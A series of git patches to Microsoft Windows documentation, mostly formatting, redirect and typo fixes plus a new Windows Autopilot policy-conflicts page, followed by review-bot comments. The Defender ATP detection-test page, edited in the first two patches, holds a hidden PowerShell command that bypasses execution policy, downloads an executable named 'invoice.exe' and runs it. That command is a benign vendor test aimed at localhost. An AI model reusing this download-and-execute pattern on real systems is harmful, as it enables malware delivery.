From e7e1753ecdb72351498ce6fe12c057b084402f31 Mon Sep 17 00:00:00 2001 From: Steve Burkett Date: Fri, 22 May 2020 12:10:14 +1200 Subject: [PATCH 1/6] Update run-detection-test.md Update folder and script to use the MDATP branding. --- .../microsoft-defender-atp/run-detection-test.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/windows/security/threat-protection/microsoft-defender-atp/run-detection-test.md b/windows/security/threat-protection/microsoft-defender-atp/run-detection-test.md index 2251ec4e49..624f4aaf34 100644 --- a/windows/security/threat-protection/microsoft-defender-atp/run-detection-test.md +++ b/windows/security/threat-protection/microsoft-defender-atp/run-detection-test.md @@ -30,7 +30,7 @@ ms.topic: article Run the following PowerShell script on a newly onboarded machine to verify that it is properly reporting to the Microsoft Defender ATP service. -1. Create a folder: 'C:\test-WDATP-test'. +1. Create a folder: 'C:\test-MDATP-test'. 2. Open an elevated command-line prompt on the machine and run the script: a. Go to **Start** and type **cmd**. 
@@ -42,7 +42,7 @@ Run the following PowerShell script on a newly onboarded machine to verify that 3. At the prompt, copy and run the following command: ``` - powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe' + powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe' ``` The Command Prompt window will close automatically. If successful, the detection test will be marked as completed and a new alert will appear in the portal for the onboarded machine in approximately 10 minutes. From 8d084ea88888e2187590b5226ca37a5623fe8cf8 Mon Sep 17 00:00:00 2001 From: Gary Moore Date: Fri, 22 May 2020 14:52:18 -0700 Subject: [PATCH 2/6] Corrected list, indentation, and code block --- .../microsoft-defender-atp/run-detection-test.md | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/windows/security/threat-protection/microsoft-defender-atp/run-detection-test.md b/windows/security/threat-protection/microsoft-defender-atp/run-detection-test.md index 624f4aaf34..b3955f8794 100644 --- a/windows/security/threat-protection/microsoft-defender-atp/run-detection-test.md +++ b/windows/security/threat-protection/microsoft-defender-atp/run-detection-test.md 
@@ -33,17 +33,17 @@ Run the following PowerShell script on a newly onboarded machine to verify that 1. Create a folder: 'C:\test-MDATP-test'. 2. Open an elevated command-line prompt on the machine and run the script: - a. Go to **Start** and type **cmd**. + 1. Go to **Start** and type **cmd**. - b. Right-click **Command Prompt** and select **Run as administrator**. + 1. Right-click **Command Prompt** and select **Run as administrator**. - ![Window Start menu pointing to Run as administrator](images/run-as-admin.png) + ![Window Start menu pointing to Run as administrator](images/run-as-admin.png) 3. At the prompt, copy and run the following command: - ``` - powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe' - ``` + ```powershell + powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe' + ``` The Command Prompt window will close automatically. If successful, the detection test will be marked as completed and a new alert will appear in the portal for the onboarded machine in approximately 10 minutes. From 28a81362bffc836452b8ef5d355d78cd7a038fbd Mon Sep 17 00:00:00 2001 From: Joey Caparas Date: Fri, 22 May 2020 15:05:55 -0700 Subject: [PATCH 3/6] remove from toc fix redirect --- .openpublishing.redirection.json | 2 +- windows/security/threat-protection/TOC.md | 1 - 2 files changed, 1 insertion(+), 2 deletions(-) diff --git a/.openpublishing.redirection.json b/.openpublishing.redirection.json index 863e6b22b7..bf51ddcd42 100644 --- a/.openpublishing.redirection.json +++ b/.openpublishing.redirection.json 
@@ -1353,7 +1353,7 @@ }, { "source_path": "windows/security/threat-protection/microsoft-defender-atp/configure-splunk.md", -"redirect_url": "https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-siem-integration", +"redirect_url": "https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/configure-siem", "redirect_document_id": false }, { diff --git a/windows/security/threat-protection/TOC.md b/windows/security/threat-protection/TOC.md index 75641809bf..50032d076f 100644 --- a/windows/security/threat-protection/TOC.md +++ b/windows/security/threat-protection/TOC.md @@ -573,7 +573,6 @@ ##### [Understand threat intelligence concepts](microsoft-defender-atp/threat-indicator-concepts.md) ##### [Learn about different ways to pull detections](microsoft-defender-atp/configure-siem.md) ##### [Enable SIEM integration](microsoft-defender-atp/enable-siem-integration.md) -##### [Configure Splunk to pull detections](microsoft-defender-atp/configure-splunk.md) ##### [Configure Micro Focus ArcSight to pull detections](microsoft-defender-atp/configure-arcsight.md) ##### [Microsoft Defender ATP detection fields](microsoft-defender-atp/api-portal-mapping.md) ##### [Pull detections using SIEM REST API](microsoft-defender-atp/pull-alerts-using-rest-api.md) From 73ff781a3c6e503aeddc7ace4453ffc1306430a2 Mon Sep 17 00:00:00 2001 From: Joey Caparas Date: Fri, 22 May 2020 15:09:46 -0700 Subject: [PATCH 4/6] fix bullet --- .../microsoft-defender-atp/configure-siem.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/windows/security/threat-protection/microsoft-defender-atp/configure-siem.md b/windows/security/threat-protection/microsoft-defender-atp/configure-siem.md index 0d95a0d4e0..d5f2d69d6c 100644 --- a/windows/security/threat-protection/microsoft-defender-atp/configure-siem.md +++ b/windows/security/threat-protection/microsoft-defender-atp/configure-siem.md 
@@ -27,10 +27,10 @@ ms.topic: article ## Pull detections using security information and events management (SIEM) tools ->[!Note] +>[!NOTE] >- [Microsoft Defender ATP Alert](alerts.md) is composed from one or more detections. >- [Microsoft Defender ATP Detection](api-portal-mapping.md) is composed from the suspicious event occurred on the Machine and its related Alert details. ->-The Microsoft Defender ATP Alert API is the latest API for alert consumption and contain a detailed list of related evidence for each alert. For more information, see [Alert methods and properties](alerts.md) and [List alerts](get-alerts.md). +>- The Microsoft Defender ATP Alert API is the latest API for alert consumption and contain a detailed list of related evidence for each alert. For more information, see [Alert methods and properties](alerts.md) and [List alerts](get-alerts.md). Microsoft Defender ATP supports security information and event management (SIEM) tools to pull detections. Microsoft Defender ATP exposes alerts through an HTTPS endpoint hosted in Azure. The endpoint can be configured to pull detections from your enterprise tenant in Azure Active Directory (AAD) using the OAuth 2.0 authentication protocol for an AAD application that represents the specific SIEM connector installed in your environment. From 353311f2533870af725d0e7f6617c9b8ea631387 Mon Sep 17 00:00:00 2001 From: Greg Lindsay Date: Fri, 22 May 2020 17:59:10 -0700 Subject: [PATCH 5/6] new topic --- windows/deployment/windows-autopilot/TOC.md | 1 + .../windows-autopilot/policy-conflicts.md | 37 +++++++++++++++++++ 2 files changed, 38 insertions(+) create mode 100644 windows/deployment/windows-autopilot/policy-conflicts.md diff --git a/windows/deployment/windows-autopilot/TOC.md b/windows/deployment/windows-autopilot/TOC.md index d94b04fdcb..9b7c22ee03 100644 --- a/windows/deployment/windows-autopilot/TOC.md +++ b/windows/deployment/windows-autopilot/TOC.md 
@@ -22,6 +22,7 @@ ## [DFCI management](dfci-management.md) ## [Windows Autopilot update](autopilot-update.md) ## [Troubleshooting](troubleshooting.md) +## [Policy conflicts](policy-conflicts.md) ## [Known issues](known-issues.md) # Support diff --git a/windows/deployment/windows-autopilot/policy-conflicts.md b/windows/deployment/windows-autopilot/policy-conflicts.md new file mode 100644 index 0000000000..714387478c --- /dev/null +++ b/windows/deployment/windows-autopilot/policy-conflicts.md @@ -0,0 +1,37 @@ +--- +title: Windows Autopilot policy conflicts +ms.reviewer: +manager: laurawi +description: Inform yourself about known issues that may occur during Windows Autopilot deployment. +keywords: mdm, setup, windows, windows 10, oobe, manage, deploy, autopilot, ztd, zero-touch, partner, msfb, intune +ms.prod: w10 +ms.mktglfcycl: deploy +ms.localizationpriority: medium +ms.sitesec: library +ms.pagetype: deploy +audience: itpro +author: mtniehaus +ms.author: mtniehaus +ms.collection: M365-modern-desktop +ms.topic: article +--- + + +# Windows Autopilot - Policy Conflicts + +**Applies to** + +- Windows 10 + +There are a sigificant number of policy settings available for Windows 10, both as native MDM policies and group policy (ADMX-backed) settings. Some of these can cause issues in certain Windows Autopilot scenarios as a result of how they change the behavior of Windows 10. If you encounter any of these issues, remove the policy in question to resolve the issue. + + +
PolicyMore information + +
Device restriction / Password policy +When certain DeviceLock policies, such as minimum password length and password complexity, or any similar group policy settings, including any that disable auto-logon, are applied to a device, and that device reboots during the device Enrollment Status Page (ESP), the out-of-box experience or user desktop auto-logon could fail unexpectantly. +
+ +## Related topics + +[Troubleshooting Windows Autopilot](troubleshooting.md) From 377f5ca9a3233b32d91d9a6edd8682bed737d69d Mon Sep 17 00:00:00 2001 From: Greg Lindsay Date: Fri, 22 May 2020 18:13:53 -0700 Subject: [PATCH 6/6] fix warnings --- windows/deployment/windows-autopilot/policy-conflicts.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/windows/deployment/windows-autopilot/policy-conflicts.md b/windows/deployment/windows-autopilot/policy-conflicts.md index 714387478c..3fd528f206 100644 --- a/windows/deployment/windows-autopilot/policy-conflicts.md +++ b/windows/deployment/windows-autopilot/policy-conflicts.md @@ -11,7 +11,7 @@ ms.sitesec: library ms.pagetype: deploy audience: itpro author: mtniehaus -ms.author: mtniehaus +ms.author: mniehaus ms.collection: M365-modern-desktop ms.topic: article --- @@ -28,7 +28,7 @@ There are a sigificant number of policy settings available for Windows 10, both
PolicyMore information -
Device restriction / Password policy +
Device restriction / Password policy When certain DeviceLock policies, such as minimum password length and password complexity, or any similar group policy settings, including any that disable auto-logon, are applied to a device, and that device reboots during the device Enrollment Status Page (ESP), the out-of-box experience or user desktop auto-logon could fail unexpectantly.
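Review bot: PATCH 1/6, second hunk of run-detection-test.md: the rename changes the literal path inside the detection test command, and nothing in the patch shows that the test alert still fires when the file is written to 'C:\test-MDATP-test'. Please confirm with the detection owners that the alert does not depend on the old 'test-WDATP-test' folder name, because the page promises an alert in approximately 10 minutes and a silent miss would read as a failed onboarding. Step 1 also writes the folder with single backslashes while the command uses 'C:\\test-MDATP-test\\invoice.exe'; PowerShell does not treat the backslash as an escape inside single quotes, so the two forms should be made consistent if the detection allows it.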
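Review bot: PATCH 2/6, the new fence tag on the test command: step 2 opens Command Prompt and step 3 says to run the line "at the prompt", so the line is a cmd invocation of powershell.exe, while the `powershell` tag presents it as something to paste into a PowerShell session. Either pick a tag that matches the shell named in step 2 or add a sentence stating that the line is entered in the elevated Command Prompt. The intro sentence "Run the following PowerShell script" carries the same ambiguity and could be aligned in the same change.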
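Review bot: PATCH 3/6, .openpublishing.redirection.json: the redirect for configure-splunk.md now lands on configure-siem, but the patch does not show whether that page carries any Splunk guidance, so readers following old Splunk links may arrive at a page that no longer answers their question. Please confirm the target covers Splunk or says where that guidance went, and check for remaining in-repo links to configure-splunk.md beyond the TOC entry removed here. The commit message "remove from toc fix redirect" would be easier to audit if it named the page being retired.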
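Review bot: PATCH 4/6, the bullet repaired in configure-siem.md still reads "is the latest API for alert consumption and contain a detailed list"; since the line is being touched anyway, change "contain" to "contains". The unchanged bullet above it ("is composed from the suspicious event occurred on the Machine and its related Alert details") needs the same grammar pass, for example "is composed of the suspicious event that occurred on the machine and its related alert details".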
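Review bot: PATCH 5/6, new file policy-conflicts.md: the only remediation given is "remove the policy in question", and the only row in the table is the DeviceLock password length and complexity policy, so as written the page tells admins to drop a password policy without saying whether that is meant for the enrollment period only or permanently. Please state the intended scope, for example whether the policy should be applied after the Enrollment Status Page completes. In the same file, the front-matter description ("Inform yourself about known issues that may occur during Windows Autopilot deployment") describes the known-issues topic rather than policy conflicts, "ms.reviewer:" is empty, and "sigificant" and "unexpectantly" should be "significant" and "unexpectedly".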
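Review bot: PATCH 6/6, front matter of policy-conflicts.md: after this change "author: mtniehaus" and "ms.author: mniehaus" differ, and the patch does not say which of the two spellings was wrong. Please confirm that the first is the GitHub account and the second the Microsoft alias, so the mismatch is intended rather than a half-applied fix. The context line of the second hunk still shows "sigificant" and the table row still shows "unexpectantly", so the typos introduced in 5/6 survive this "fix warnings" pass.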